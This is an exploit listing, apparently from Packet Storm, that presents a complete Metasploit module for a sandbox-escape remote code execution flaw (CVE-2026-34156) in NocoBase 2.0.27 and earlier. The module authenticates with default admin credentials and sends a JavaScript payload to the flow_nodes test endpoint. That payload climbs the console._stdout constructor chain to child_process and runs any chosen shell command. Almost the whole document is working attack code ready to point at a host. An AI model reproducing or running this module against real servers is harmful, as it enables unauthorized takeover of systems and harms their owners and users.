Share
## https://sploitus.com/exploit?id=PACKETSTORM:219776
==================================================================================================================================
    | # Title     : NocoBase 2.0.27 Sandbox Escape RCE Metasploit Module                                                             |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.nocobase.com                                                                                         |
    ==================================================================================================================================
    
    [+] Summary    : This code is a Metasploit Auxiliary module designed to exploit a Remote Code Execution (RCE) vulnerability in NocoBase (<= 2.0.27).
                     It targets a flaw in the server-side script execution engine (flow_nodes) that allows breaking out of the JavaScript sandbox.
    
    [+] POC        :  
    
    ##
    # CVE-2026-34156 - NocoBase RCE
    # Sandbox escape via console._stdout prototype chain
    ##
    
    require 'msf/core'
    require 'json'
    require 'uri'
    require 'net/http'
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
    
      def initialize(info = {})
        super(update_info(info,
          'Name'        => 'NocoBase RCE via Sandbox Escape',
          'Description' => %q{
            This module exploits a sandbox escape in NocoBase (<= 2.0.27)
            via prototype chain manipulation leading to RCE.
          },
          'Author'      => ['Indoushka'],
          'License'     => MSF_LICENSE,
          'References'  => [
            ['CVE', '2026-34156']
          ]
        ))
    
        register_options([
          Opt::RHOST(),
          Opt::RPORT(80),
          OptString.new('TARGETURI', [true, 'Base path', '/']),
          OptString.new('USERNAME', [true, 'Username', 'admin@nocobase.com']),
          OptString.new('PASSWORD', [true, 'Password', 'admin123']),
          OptString.new('CMD', [false, 'Command to execute', 'id'])
        ])
      end
    
      def build_payload(cmd)
        safe_cmd = cmd.gsub("'", "\\\\'")
    
        <<~JS.strip
          const Fn=console._stdout.constructor.constructor;
          const proc=Fn('return process')();
          const cp=proc.mainModule.require('child_process');
          return cp.execSync('#{safe_cmd}',{shell:'/bin/sh'}).toString().trim();
        JS
      end
    
      def login
        res = send_request_cgi({
          'method' => 'POST',
          'uri'    => normalize_uri(target_uri.path, '/api/auth:signIn'),
          'ctype'  => 'application/json',
          'data'   => {
            'account'  => datastore['USERNAME'],
            'password' => datastore['PASSWORD']
          }.to_json
        })
    
        if res && res.code == 200
          json = res.get_json_document
          if json && json['data'] && json['data']['token']
            return json['data']['token']
          end
        end
    
        nil
      end
    
      def exec_cmd(token, cmd)
        res = send_request_cgi({
          'method' => 'POST',
          'uri'    => normalize_uri(target_uri.path, '/api/flow_nodes:test'),
          'ctype'  => 'application/json',
          'headers' => {
            'Authorization' => "Bearer #{token}"
          },
          'data' => {
            'type' => 'script',
            'config' => {
              'content' => build_payload(cmd),
              'timeout' => 5000,
              'arguments' => []
            }
          }.to_json
        })
    
        return nil unless res
    
        begin
          json = res.get_json_document
          return json['data']['result'] if json && json['data']
        rescue
          return res.body
        end
    
        nil
      end
    
      def run
        print_status("Starting NocoBase RCE exploit...")
    
        token = login
    
        if token.nil?
          print_error("Login failed")
          return
        end
    
        print_good("Authenticated successfully")
    
        cmd = datastore['CMD']
    
        print_status("Executing: #{cmd}")
    
        result = exec_cmd(token, cmd)
    
        if result
          print_good("Output:\n#{result}")
        else
          print_error("No output received")
        end
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================